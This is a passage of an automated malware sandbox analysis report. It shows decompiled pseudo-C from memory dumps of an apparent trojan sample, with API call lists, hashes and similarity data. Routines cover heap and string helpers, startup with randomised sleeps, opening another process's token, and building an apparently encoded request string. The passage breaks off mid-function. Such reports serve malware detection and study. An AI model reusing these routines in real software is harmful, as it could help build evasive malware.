                                • Instruction ID: 8f052b6c3336184f87cc1ab8f52b6886c3d98b70eb81f0fe9477547a2a575a7e
                                • Opcode Fuzzy Hash: 32c22b18ac606fbd51373097314ebd35e4e2cba257bc3bd2a89818bf8e882801
                                • Instruction Fuzzy Hash: 67F0C0B1B02311ABEB24BEB5D95CB5637ACEB44B61B040E57FC05D71A4DA2DEC40C990
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 37%
                                			E048150DF() {
                                				void* _v0;
                                				void** _t3;
                                				void** _t5;
                                				void** _t7;
                                				void** _t8;
                                				void* _t10;
                                
                                				_t3 =  *0x481a37c; // 0x68d9630
                                				__imp__( &(_t3[0x10]));
                                				while(1) {
                                					_t5 =  *0x481a37c; // 0x68d9630
                                					_t1 =  &(_t5[0x16]); // 0x0
                                					if( *_t1 == 0) {
                                						break;
                                					}
                                					Sleep(0xa);
                                				}
                                				_t7 =  *0x481a37c; // 0x68d9630
                                				_t10 =  *_t7;
                                				if(_t10 != 0 && _t10 != 0x481b83e) {
                                					HeapFree( *0x481a290, 0, _t10);
                                					_t7 =  *0x481a37c; // 0x68d9630
                                				}
                                				 *_t7 = _v0;
                                				_t8 =  &(_t7[0x10]);
                                				__imp__(_t8);
                                				return _t8;
                                			}










                                APIs
                                • RtlEnterCriticalSection.NTDLL(068D95F0), ref: 048150E8
                                • Sleep.KERNEL32(0000000A,?,?,048155D3,?,?,?,?,?,04816BD8,?,00000001), ref: 048150F2
                                • HeapFree.KERNEL32(00000000,?,?,?,048155D3,?,?,?,?,?,04816BD8,?,00000001), ref: 04815120
                                • RtlLeaveCriticalSection.NTDLL(068D95F0), ref: 04815135
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID:
                                • API String ID: 58946197-0
                                • Opcode ID: d4185bc7b5eab3600e54e138530d177e3cd68f3bf1ccf383271d13ff61151dfb
                                • Instruction ID: 10e6cfe3f68020e7c14d23a7c62312b5933402f71191779ff63a59be780a6c99
                                • Opcode Fuzzy Hash: d4185bc7b5eab3600e54e138530d177e3cd68f3bf1ccf383271d13ff61151dfb
                                • Instruction Fuzzy Hash: 6AF0D4B4601200EBE718AF68E869B2537ACEB48B09B054D1BE906D7370D738EC00DA21
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 58%
                                			E04813D98(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                				intOrPtr* _v8;
                                				void* _t17;
                                				intOrPtr* _t22;
                                				void* _t27;
                                				char* _t30;
                                				void* _t33;
                                				void* _t34;
                                				void* _t36;
                                				void* _t37;
                                				void* _t39;
                                				int _t42;
                                
                                				_t17 = __eax;
                                				_t37 = 0;
                                				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                				_t2 = _t17 + 1; // 0x1
                                				_t28 = _t2;
                                				_t34 = E04816837(_t2);
                                				if(_t34 != 0) {
                                					_t30 = E04816837(_t28);
                                					if(_t30 == 0) {
                                						E048150CA(_t34);
                                					} else {
                                						_t39 = _a4;
                                						_t22 = E048177DD(_t39);
                                						_v8 = _t22;
                                						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                							_a4 = _t39;
                                						} else {
                                							_t26 = _t22 + 2;
                                							_a4 = _t22 + 2;
                                							_t22 = E048177DD(_t26);
                                							_v8 = _t22;
                                						}
                                						if(_t22 == 0) {
                                							__imp__(_t34, _a4);
                                							 *_t30 = 0x2f;
                                							 *((char*)(_t30 + 1)) = 0;
                                						} else {
                                							_t42 = _t22 - _a4;
                                							memcpy(_t34, _a4, _t42);
                                							 *((char*)(_t34 + _t42)) = 0;
                                							__imp__(_t30, _v8);
                                						}
                                						 *_a8 = _t34;
                                						_t37 = 1;
                                						 *_a12 = _t30;
                                					}
                                				}
                                				return _t37;
                                			}















                                APIs
                                • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,04813CEE,00000000,00000000,00000000,068D9698,?,?,0481106E,?,068D9698), ref: 04813DA4
                                  • Part of subcall function 04816837: RtlAllocateHeap.NTDLL(00000000,00000000,04814197), ref: 04816843
                                  • Part of subcall function 048177DD: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04813DD2,00000000,00000001,00000001,?,?,04813CEE,00000000,00000000,00000000,068D9698), ref: 048177EB
                                  • Part of subcall function 048177DD: StrChrA.SHLWAPI(?,0000003F,?,?,04813CEE,00000000,00000000,00000000,068D9698,?,?,0481106E,?,068D9698,0000EA60,?), ref: 048177F5
                                • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04813CEE,00000000,00000000,00000000,068D9698,?,?,0481106E), ref: 04813E02
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 04813E12
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 04813E1E
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                • String ID:
                                • API String ID: 3767559652-0
                                • Opcode ID: e61451813e174982325d90bcebb84a59a5e613476f5eb053994ba92380377b61
                                • Instruction ID: 46e80da21d1ca8085badae268fd3db9e629ea8bc8fb9013aed8293be2d1fa43d
                                • Opcode Fuzzy Hash: e61451813e174982325d90bcebb84a59a5e613476f5eb053994ba92380377b61
                                • Instruction Fuzzy Hash: D621A2B2900255ABEB12AF68C894AAA7FBCDF0A244F044956FC05DB221E774E941D7A1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E04815D37(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                				void* _v8;
                                				void* _t18;
                                				int _t25;
                                				int _t29;
                                				int _t34;
                                
                                				_t29 = lstrlenW(_a4);
                                				_t25 = lstrlenW(_a8);
                                				_t18 = E04816837(_t25 + _t29 + _t25 + _t29 + 2);
                                				_v8 = _t18;
                                				if(_t18 != 0) {
                                					_t34 = _t29 + _t29;
                                					memcpy(_t18, _a4, _t34);
                                					_t10 = _t25 + 2; // 0x2
                                					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                				}
                                				return _v8;
                                			}









                                APIs
                                • lstrlenW.KERNEL32(004F0053,?,75145520,00000008,068D92FC,?,04811B37,004F0053,068D92FC,?,?,?,?,?,?,048120B0), ref: 04815D47
                                • lstrlenW.KERNEL32(04811B37,?,04811B37,004F0053,068D92FC,?,?,?,?,?,?,048120B0), ref: 04815D4E
                                  • Part of subcall function 04816837: RtlAllocateHeap.NTDLL(00000000,00000000,04814197), ref: 04816843
                                • memcpy.NTDLL(00000000,004F0053,751469A0,?,?,04811B37,004F0053,068D92FC,?,?,?,?,?,?,048120B0), ref: 04815D6E
                                • memcpy.NTDLL(751469A0,04811B37,00000002,00000000,004F0053,751469A0,?,?,04811B37,004F0053,068D92FC), ref: 04815D81
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: lstrlenmemcpy$AllocateHeap
                                • String ID:
                                • API String ID: 2411391700-0
                                • Opcode ID: e03263321a4911b53a8a73db2de302b12a324f779048e41bf9c16172cf38ac30
                                • Instruction ID: edf8aef50661ead3278a25d3ba460194e7d489e4454f27b19b3c44734b2062be
                                • Opcode Fuzzy Hash: e03263321a4911b53a8a73db2de302b12a324f779048e41bf9c16172cf38ac30
                                • Instruction Fuzzy Hash: F9F04976900118BBCF10EFA8CC84CDE7BACEF082987014563F908E7211E775EA149BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrlen.KERNEL32(068D87FA,00000000,00000000,00000000,04817100,00000000), ref: 048121D1
                                • lstrlen.KERNEL32(?), ref: 048121D9
                                  • Part of subcall function 04816837: RtlAllocateHeap.NTDLL(00000000,00000000,04814197), ref: 04816843
                                • lstrcpy.KERNEL32(00000000,068D87FA), ref: 048121ED
                                • lstrcat.KERNEL32(00000000,?), ref: 048121F8
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                • String ID:
                                • API String ID: 74227042-0
                                • Opcode ID: 34468215b58a8db0f157c394cfbc02b616e0887bc8e0fa2348ba357b5137b220
                                • Instruction ID: bb8e63d0d01c6c4f8e3b2ac9ecf484b80860e23326bcb2c2eeb2966d2ffb5c18
                                • Opcode Fuzzy Hash: 34468215b58a8db0f157c394cfbc02b616e0887bc8e0fa2348ba357b5137b220
                                • Instruction Fuzzy Hash: FDE012B3901225678711ABE8AC48CAFBBADEF896517050C57FA04E3120C768DD05DBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Executed Functions

                                C-Code - Quality: 73%
                                			E04196B0F(void* __edx, intOrPtr _a4) {
                                				struct _FILETIME _v12;
                                				char _v32;
                                				long _v40;
                                				void* _t14;
                                				void* _t16;
                                				int _t18;
                                				signed int _t20;
                                				void* _t22;
                                				signed int _t23;
                                				intOrPtr _t25;
                                				unsigned int _t29;
                                				void* _t33;
                                				signed int _t40;
                                
                                				_t33 = __edx;
                                				_t14 = HeapCreate(0, 0x400000, 0); // executed
                                				 *0x419a290 = _t14;
                                				if(_t14 != 0) {
                                					 *0x419a180 = GetTickCount();
                                					_t16 = E04194C1B(_a4);
                                					if(_t16 != 0) {
                                						L10:
                                						return _t16;
                                					} else {
                                						goto L3;
                                					}
                                					do {
                                						L3:
                                						GetSystemTimeAsFileTime( &_v12);
                                						_t18 = SwitchToThread();
                                						_t29 = _v12.dwHighDateTime;
                                						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 7;
                                						_push(0);
                                						_push(9);
                                						_push(_t29 >> 7);
                                						_push(_t20);
                                						L04197EEA();
                                						_t40 = _t18 + _t20;
                                						_t22 = E0419414A(_a4, _t40);
                                						_t23 = 2;
                                						Sleep(_t23 << _t40); // executed
                                					} while (_t22 == 1);
                                					_t25 =  *0x419a2ac; // 0x354
                                					_v32 = 0;
                                					if(_t25 != 0) {
                                						__imp__(_t25,  &_v32);
                                						if(_t25 == 0) {
                                							_v40 = 0;
                                						}
                                						if(_v40 != 0) {
                                							 *0x419a2b8 = 1;
                                						}
                                					}
                                					_t16 = E041953F2(_t33);
                                					goto L10;
                                				}
                                				_t16 = 8;
                                				goto L10;
                                			}

















                                APIs
                                • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 04196B24
                                • GetTickCount.KERNEL32 ref: 04196B3B
                                • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 04196B5B
                                • SwitchToThread.KERNEL32(?,00000001), ref: 04196B61
                                • _aullrem.NTDLL(?,?,00000009,00000000), ref: 04196B7D
                                • Sleep.KERNELBASE(00000002,00000000,?,00000001), ref: 04196B97
                                • IsWow64Process.KERNEL32(00000354,?,?,00000001), ref: 04196BB5
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
                                • String ID:
                                • API String ID: 3690864001-0
                                • Opcode ID: b76a6b50eead598c91de5f064f5f0062c58d524d93e3b981926cfa548e28e95f
                                • Instruction ID: de8e3b046cfe8a3804f7fb6988e353627c571c15a0511c1d3861b2a4117bcd67
                                • Opcode Fuzzy Hash: b76a6b50eead598c91de5f064f5f0062c58d524d93e3b981926cfa548e28e95f
                                • Instruction Fuzzy Hash: 352102F2B04214BFDB109F66D8D9A2A77DCFB44350F00492DF51AC2240EB79AC888B65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                				intOrPtr _t4;
                                				void* _t10;
                                				void* _t11;
                                				void* _t13;
                                
                                				_t13 = 1;
                                				_t4 = _a8;
                                				if(_t4 == 0) {
                                					if(InterlockedDecrement(0x419a294) == 0) {
                                						E04195076();
                                					}
                                				} else {
                                					if(_t4 == 1 && InterlockedIncrement(0x419a294) == 1) {
                                						_t10 = E04196B0F(_t11, _a4); // executed
                                						if(_t10 != 0) {
                                							_t13 = 0;
                                						}
                                					}
                                				}
                                				return _t13;
                                			}








                                APIs
                                • InterlockedIncrement.KERNEL32(0419A294), ref: 0419569A
                                  • Part of subcall function 04196B0F: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 04196B24
                                • InterlockedDecrement.KERNEL32(0419A294), ref: 041956BA
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Interlocked$CreateDecrementHeapIncrement
                                • String ID:
                                • API String ID: 3834848776-0
                                • Opcode ID: bb8faef38c1c0ec6a25e9aa86293efa1185b602ca32e81f7e3a3bc44a21ad433
                                • Instruction ID: 72e32fd26b832272938fb458ed062efc304bd923a484ba7009737339a01550d8
                                • Opcode Fuzzy Hash: bb8faef38c1c0ec6a25e9aa86293efa1185b602ca32e81f7e3a3bc44a21ad433
                                • Instruction Fuzzy Hash: 85E01A36B04222779F272A64D984A9A67D6AB43BC4B058454E681E1028EB15BC50C6E1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                C-Code - Quality: 22%
                                			E04192D06(char _a4, void* _a8) {
                                				void* _v8;
                                				void* _v12;
                                				char _v16;
                                				void* _v20;
                                				char _v24;
                                				char _v28;
                                				char _v32;
                                				char _v36;
                                				char _v40;
                                				void* _v44;
                                				void** _t33;
                                				void* _t43;
                                				void** _t44;
                                				intOrPtr* _t47;
                                				char _t48;
                                
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				_v20 = _a4;
                                				_t48 = 0;
                                				_v16 = 0;
                                				_a4 = 0;
                                				_v44 = 0x18;
                                				_v40 = 0;
                                				_v32 = 0;
                                				_v36 = 0;
                                				_v28 = 0;
                                				_v24 = 0;
                                				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                					_t33 =  &_v8;
                                					__imp__(_v12, 8, _t33);
                                					if(_t33 >= 0) {
                                						_t47 = __imp__;
                                						 *_t47(_v8, 1, 0, 0,  &_a4, _t43);
                                						_t44 = E04196837(_a4);
                                						if(_t44 != 0) {
                                							_push( &_a4);
                                							_push(_a4);
                                							_push(_t44);
                                							_push(1);
                                							_push(_v8);
                                							if( *_t47() >= 0) {
                                								memcpy(_a8,  *_t44, 0x1c);
                                								_t48 = 1;
                                							}
                                							E041950CA(_t44);
                                						}
                                						NtClose(_v8);
                                					}
                                					NtClose(_v12);
                                				}
                                				return _t48;
                                			}



















                                APIs
                                • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04192D4D
                                • NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 04192D60
                                • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 04192D7C
                                  • Part of subcall function 04196837: RtlAllocateHeap.NTDLL(00000000,00000000,04194197), ref: 04196843
                                • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 04192D99
                                • memcpy.NTDLL(00000000,00000000,0000001C), ref: 04192DA6
                                • NtClose.NTDLL(00000000), ref: 04192DB8
                                • NtClose.NTDLL(00000000), ref: 04192DC2
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                • String ID:
                                • API String ID: 2575439697-0
                                • Opcode ID: 68b94ab37a3d701fc8b7157ab504e25572c8af10525d179ea082a27366b635d1
                                • Instruction ID: 2a98aa8c60e701212fb8cb6a182c18677dcde1eb29beb91284f48b02c3c110ee
                                • Opcode Fuzzy Hash: 68b94ab37a3d701fc8b7157ab504e25572c8af10525d179ea082a27366b635d1
                                • Instruction Fuzzy Hash: E42105B2910218BBDF01AF95CC85DDEBFBDFF08750F1040A6F904A6250D7719E409BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 51%
                                			E041946D1(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
                                				void* _v8;
                                				void* _v12;
                                				void* _v16;
                                				void* _v20;
                                				void* __ebx;
                                				void* __edi;
                                				long _t63;
                                				intOrPtr _t64;
                                				intOrPtr _t65;
                                				intOrPtr _t66;
                                				intOrPtr _t67;
                                				intOrPtr _t68;
                                				intOrPtr _t72;
                                				void* _t75;
                                				void* _t76;
                                				intOrPtr _t77;
                                				intOrPtr _t81;
                                				intOrPtr _t85;
                                				intOrPtr _t86;
                                				void* _t88;
                                				void* _t91;
                                				intOrPtr _t95;
                                				intOrPtr _t99;
                                				intOrPtr* _t101;
                                				void* _t107;
                                				intOrPtr _t111;
                                				signed int _t115;
                                				char** _t117;
                                				int _t120;
                                				intOrPtr* _t123;
                                				intOrPtr* _t125;
                                				intOrPtr* _t127;
                                				intOrPtr* _t129;
                                				intOrPtr _t132;
                                				intOrPtr _t135;
                                				void* _t138;
                                				intOrPtr _t139;
                                				void* _t142;
                                				void* _t143;
                                				void* _t144;
                                				void* _t154;
                                				void* _t157;
                                				void* _t158;
                                				void* _t159;
                                				void* _t160;
                                				intOrPtr _t161;
                                				void* _t163;
                                				intOrPtr* _t166;
                                				long _t167;
                                				intOrPtr* _t168;
                                				intOrPtr* _t171;
                                				void* _t172;
                                				void* _t174;
                                				void* _t175;
                                				void* _t180;
                                
                                				_t154 = __edx;
                                				_t144 = __ecx;
                                				_t63 = __eax;
                                				_t143 = _a20;
                                				_a20 = 8;
                                				if(__eax == 0) {
                                					_t63 = GetTickCount();
                                				}
                                				_t64 =  *0x419a018; // 0x0
                                				asm("bswap eax");
                                				_t65 =  *0x419a014; // 0x0
                                				_t166 =  *0x419a134; // 0x4197909
                                				asm("bswap eax");
                                				_t66 =  *0x419a010; // 0x0
                                				asm("bswap eax");
                                				_t67 =  *0x419a00c; // 0x0
                                				asm("bswap eax");
                                				_t68 =  *0x419a2d4; // 0x0
                                				_t3 = _t68 + 0x419b613; // 0x51082418
                                				_t157 =  *_t166(_t143, _t3, 3, 0x3d15c, _t67, _t66, _t65, _t64,  *0x419a02c,  *0x419a004, _t63);
                                				_t72 =  *0x419a2d4; // 0x0
                                				_t4 = _t72 + 0x419b653; // 0x98a9fe19
                                				_t75 =  *_t166(_t157 + _t143, _t4, E04196A09());
                                				_t174 = _t172 + 0x38;
                                				_t158 = _t157 + _t75;
                                				if(_a8 != 0) {
                                					_t139 =  *0x419a2d4; // 0x0
                                					_t8 = _t139 + 0x419b65e; // 0x35265981
                                					_t142 =  *_t166(_t158 + _t143, _t8, _a8);
                                					_t174 = _t174 + 0xc;
                                					_t158 = _t158 + _t142;
                                				}
                                				_t76 = E04195040(_t144);
                                				_t77 =  *0x419a2d4; // 0x0
                                				_t10 = _t77 + 0x419b302; // 0x4ad9ece2
                                				_t159 = _t158 +  *_t166(_t158 + _t143, _t10, _t76, _t154);
                                				_t81 =  *0x419a2d4; // 0x0
                                				_t12 = _t81 + 0x419b7aa; // 0x419b7aa
                                				_t180 = _a4 - _t12;
                                				_t14 = _t81 + 0x419b2d7; // 0xefd2fcd4
                                				_t156 = 0 | _t180 == 0x00000000;
                                				_t160 = _t159 +  *_t166(_t159 + _t143, _t14, _t180 == 0);
                                				_t85 =  *0x419a31c; // 0x0
                                				_t175 = _t174 + 0x1c;
                                				if(_t85 != 0) {
                                					_t135 =  *0x419a2d4; // 0x0
                                					_t18 = _t135 + 0x419b8da; // 0x82681b86
                                					_t138 =  *_t166(_t160 + _t143, _t18, _t85);
                                					_t175 = _t175 + 0xc;
                                					_t160 = _t160 + _t138;
                                				}
                                				_t86 =  *0x419a32c; // 0x0
                                				if(_t86 != 0) {
                                					_t132 =  *0x419a2d4; // 0x0
                                					_t20 = _t132 + 0x419b676; // 0x26271f16
                                					 *_t166(_t160 + _t143, _t20, _t86);
                                					_t175 = _t175 + 0xc;
                                				}
                                				_t161 =  *0x419a37c; // 0x0
                                				_t88 = E04192885(0x419a00a, _t161 + 4);
                                				_t167 = 0;
                                				_v12 = _t88;
                                				if(_t88 == 0) {
                                					L28:
                                					HeapFree( *0x419a290, _t167, _t143);
                                					return _a20;
                                				} else {
                                					_t91 = RtlAllocateHeap( *0x419a290, 0, 0x800);
                                					_a8 = _t91;
                                					if(_t91 == 0) {
                                						L27:
                                						HeapFree( *0x419a290, _t167, _v12);
                                						goto L28;
                                					}
                                					E04192DD0(GetTickCount());
                                					_t95 =  *0x419a37c; // 0x0
                                					__imp__(_t95 + 0x40);
                                					asm("lock xadd [eax], ecx");
                                					_t99 =  *0x419a37c; // 0x0
                                					__imp__(_t99 + 0x40);
                                					_t101 =  *0x419a37c; // 0x0
                                					_t163 = E0419624D(1, _t156, _t143,  *_t101);
                                					_v20 = _t163;
                                					asm("lock xadd [eax], ecx");
                                					if(_t163 == 0) {
                                						L26:
                                						HeapFree( *0x419a290, _t167, _a8);
                                						goto L27;
                                					}
                                					 *0x419a10c(_t163, 0x41992ac);
                                					_push(_t163);
                                					_t107 = E041921C1();
                                					_v8 = _t107;
                                					if(_t107 == 0) {
                                						L25:
                                						HeapFree( *0x419a290, _t167, _t163);
                                						goto L26;
                                					}
                                					 *_t163 = 0;
                                					__imp__(_a8, _v12);
                                					_t168 = __imp__;
                                					 *_t168(_a8, _v8);
                                					_t111 = E04194AA6( *_t168(_a8, _t163), _a8);
                                					_a4 = _t111;
                                					if(_t111 == 0) {
                                						_a20 = 8;
                                						L23:
                                						E04191492();
                                						L24:
                                						HeapFree( *0x419a290, 0, _v8);
                                						_t167 = 0;
                                						goto L25;
                                					}
                                					_t115 = E041926C9(_t143, 0xffffffffffffffff, _t163,  &_v16);
                                					_a20 = _t115;
                                					if(_t115 == 0) {
                                						_t171 = _v16;
                                						_a20 = E0419161A(_t171, _a4, _a12, _a16);
                                						_t123 =  *((intOrPtr*)(_t171 + 8));
                                						 *((intOrPtr*)( *_t123 + 0x80))(_t123);
                                						_t125 =  *((intOrPtr*)(_t171 + 8));
                                						 *((intOrPtr*)( *_t125 + 8))(_t125);
                                						_t127 =  *((intOrPtr*)(_t171 + 4));
                                						 *((intOrPtr*)( *_t127 + 8))(_t127);
                                						_t129 =  *_t171;
                                						 *((intOrPtr*)( *_t129 + 8))(_t129);
                                						E041950CA(_t171);
                                					}
                                					if(_a20 != 0x10d2) {
                                						L18:
                                						if(_a20 == 0) {
                                							_t117 = _a12;
                                							if(_t117 != 0) {
                                								_t164 =  *_t117;
                                								_t169 =  *_a16;
                                								wcstombs( *_t117,  *_t117,  *_a16);
                                								_t120 = E0419580E(_t164, _t164, _t169 >> 1);
                                								_t163 = _v20;
                                								 *_a16 = _t120;
                                							}
                                						}
                                						goto L21;
                                					} else {
                                						if(_a12 != 0) {
                                							L21:
                                							E041950CA(_a4);
                                							if(_a20 == 0 || _a20 == 0x10d2) {
                                								goto L24;
                                							} else {
                                								goto L23;
                                							}
                                						}
                                						_a20 = _a20 & 0x00000000;
                                						goto L18;
                                					}
                                				}
                                			}

                                APIs
                                • GetTickCount.KERNEL32 ref: 041946E8
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04194825
                                • GetTickCount.KERNEL32 ref: 04194836
                                • RtlEnterCriticalSection.NTDLL(-00000040), ref: 0419484A
                                • RtlLeaveCriticalSection.NTDLL(-00000040), ref: 04194868
                                  • Part of subcall function 0419624D: lstrlen.KERNEL32(00000000,00000000,63DCC828,00000000,00000000,?,00000000,041970D9,00000000,00000000), ref: 04196278
                                  • Part of subcall function 0419624D: lstrlen.KERNEL32(00000000,?,00000000,041970D9,00000000,00000000), ref: 04196280
                                  • Part of subcall function 0419624D: strcpy.NTDLL ref: 04196297
                                  • Part of subcall function 0419624D: lstrcat.KERNEL32(00000000,00000000), ref: 041962A2
                                • lstrcpy.KERNEL32(00000000,?), ref: 041948BD
                                • lstrcat.KERNEL32(00000000,?), ref: 041948CF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 041948D5
                                  • Part of subcall function 04194AA6: lstrlen.KERNEL32(?,00000000,00000000,04197909,041913D0,?,041955DE,041955DE,?,041955DE,?,00000000,E8FA7DD7,00000000), ref: 04194AAD
                                  • Part of subcall function 04194AA6: mbstowcs.NTDLL ref: 04194AD6
                                  • Part of subcall function 04194AA6: memset.NTDLL ref: 04194AE8
                                • wcstombs.NTDLL ref: 04194966
                                  • Part of subcall function 0419161A: SysAllocString.OLEAUT32(00000000), ref: 0419165B
                                  • Part of subcall function 041950CA: HeapFree.KERNEL32(00000000,00000000,04194239,00000000,00000001,?,00000000,?,?,?,04196B8D,00000000,?,00000001), ref: 041950D6
                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 041949A7
                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 041949B7
                                • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 041949C7
                                  • Part of subcall function 041921C1: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,04197100,00000000), ref: 041921D1
                                  • Part of subcall function 041921C1: lstrlen.KERNEL32(?), ref: 041921D9
                                  • Part of subcall function 041921C1: lstrcpy.KERNEL32(00000000,00000000), ref: 041921ED
                                  • Part of subcall function 041921C1: lstrcat.KERNEL32(00000000,?), ref: 041921F8
                                • HeapFree.KERNEL32(00000000,?), ref: 041949D7
                                • HeapFree.KERNEL32(00000000,?), ref: 041949E5
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Heap$Free$lstrlen$lstrcat$CountCriticalSectionTicklstrcpy$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                • String ID:
                                • API String ID: 3886839532-0
                                • Opcode ID: 59c8a799883a05faeaffe91ab72ba328ecb1110d73db6074c7017ed155fd6dc0
                                • Instruction ID: a3c07d145b006d3fa5a3bdd1bebe86f4903b91956d87b1a0ae049cdb8ca60b88
                                • Opcode Fuzzy Hash: 59c8a799883a05faeaffe91ab72ba328ecb1110d73db6074c7017ed155fd6dc0
                                • Instruction Fuzzy Hash: 14A158B1900149AFDF11DFAADC88E9A3BE9FF49394B144065F808C7250DB39ED95DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 34%
                                			E04196EFC(long __eax, void* __edx) {
                                				intOrPtr _v4;
                                				intOrPtr _v8;
                                				void* _v12;
                                				intOrPtr _v16;
                                				intOrPtr _v28;
                                				intOrPtr _v40;
                                				intOrPtr _v44;
                                				intOrPtr _v48;
                                				void* _v60;
                                				intOrPtr _v76;
                                				void* __ecx;
                                				void* __edi;
                                				intOrPtr _t31;
                                				intOrPtr _t32;
